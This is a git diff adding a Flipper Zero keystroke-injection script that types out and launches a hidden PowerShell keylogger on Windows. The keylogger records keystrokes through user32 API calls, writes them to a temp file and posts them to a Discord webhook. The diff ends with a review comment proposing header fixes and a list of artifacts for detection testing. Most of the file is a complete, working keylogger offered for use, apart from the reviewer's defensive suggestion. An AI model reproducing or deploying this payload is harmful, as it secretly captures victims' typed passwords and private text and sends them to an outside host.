diff --git a/OSINT/Keylogger to Discord.txt b/OSINT/Keylogger to Discord.txt new file mode 100644 index 0000000..d5fe68b --- /dev/null +++ b/OSINT/Keylogger to Discord.txt 
@@ -0,0 +1,484 @@ +REM Title: Keylogger to Discord +REM Author: @beigeworm +REM Description: Uses Powershell to gather keystroke info and send it via Discord. +REM Target: Windows 10 + +REM *SETUP* +REM replace WEBHOOK_HERE with your discord webhook. +REM set $runtime=1 to desired interval beetween emails (in minutes). Default is 1 minute. + +REM some setup for dukie script +DEFAULT_DELAY 100 + +REM Open Notepad for script building. +DELAY 1000 +GUI r +DELAY 500 +STRING notepad +ENTER +DELAY 2500 +STRING Do{$whuri = "WEBHOOK_HERE";$RunTime = 1;$TimesRun = 1;$getT = Get-Date;$Subj = "$env:COMPUTERNAME : log Results";$body = "$env:COMPUTERNAME : Results : $strt" +ENTER +STRING $SMTP = "smtp.outlook.com";$Prt = "587";$Creds = new-object Management.Automation.PSCredential $FromTo, ($Pass | ConvertTo-SecureString -AsPlainText -Force) +ENTER +STRING $Attachment = $strt = Get-Date;$end = $strt.addminutes($RunTime);function Start-Key($Path="$env:temp\log.txt"){$sigs = @' +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] public static extern short GetAsyncKeyState(int virtualKeyCode); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int GetKeyboardState(byte[] keystate); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int MapVirtualKey(uint uCode, int uMapType); +ENTER +STRING [DllImport("user32.dll", CharSet=CharSet.Auto)] public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags); +ENTER +STRING '@ +ENTER +ENTER +STRING $API = Add-Type -MemberDefinition $sigs -Name 'Win32' -Namespace API -PassThru;$null = New-Item -Path $Path -ItemType File -Force;try{$rnnr = 0;while ($TimesRun -ge $rnnr){ +ENTER +STRING while ($end -ge $getT){Start-Sleep -Milliseconds 30;for($ascii = 9; $ascii -le 254; $ascii++){$state = $API::GetAsyncKeyState($ascii);if($state -eq -32767){$null = 
[console]::CapsLock +ENTER +STRING $virtualKey = $API::MapVirtualKey($ascii, 3);$kbstate = New-Object Byte[] 256;$checkkbstate = $API::GetKeyboardState($kbstate);$mychar = New-Object -TypeName System.Text.StringBuilder +ENTER +STRING $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0);if($success){[System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode)}}} +ENTER +STRING $getT = Get-Date};$msg = Get-Content -Path $Path -Raw; $escmsg = $msg -replace '[&<>]', {$args[0].Value.Replace('&', '&').Replace('<', '<').Replace('>', '>')} +ENTER +STRING $json = @{"username" = "$env:COMPUTERNAME" +ENTER +STRING "content" = $escmsg} | ConvertTo-Json +ENTER +STRING Start-Sleep 1; Invoke-RestMethod -Uri $whuri -Method Post -ContentType "application/json" -Body $json; Start-Sleep 1; $whuri = "." +ENTER +STRING Remove-Item -Path $Path -force}}finally{}}Start-Key}While ($a -le 5) +ENTER +DELAY 1000 + +REM because typing speed can't be adjusted. (Can be avoided by moving the mouse while flipper types) +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE 
+ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE 
+ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE +ESCAPE + + +DELAY 10000 +REM save in temp directory. +DELAY 1000 +CTRL-SHIFT s +DELAY 1500 +STRING %temp% +ENTER +STRING txtlog.ps1 +DELAY 500 +TAB +DOWN +DOWN +ENTER +ENTER +DELAY 1000 +ALT F4 + +REM Open Powershell and start logs. +DELAY 1000 +GUI r +DELAY 500 +STRING powershell -NoP -NonI -W Hidden -Exec Bypass -C cd $env:temp;sleep 1; ./txtlog.ps1;sleep 5;exit +ENTER +
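Review bot: The REM header at the top of this new file does not match what the payload does, and it documents none of the artifacts left on the host. It speaks of an "interval beetween emails" although the script posts to a Discord webhook, and the file is filed under OSINT/ although it is a keystroke-capture payload. I would correct the setup line to `REM set $RunTime to the capture interval in minutes before each webhook post (default 1).` and add a short REM block listing the observable artifacts for lab cleanup and detection testing. That block should name `txtlog.ps1` and `log.txt` in `%temp%`, the Run-dialog launch of `powershell -NoP -NonI -W Hidden -Exec Bypass`, the `Add-Type` import of `GetAsyncKeyState` from user32.dll, and the outbound `Invoke-RestMethod` POST to the webhook. These are the strings that PowerShell script-block logging and process-creation telemetry would record, so listing them lets a defender check that each one raises an alert.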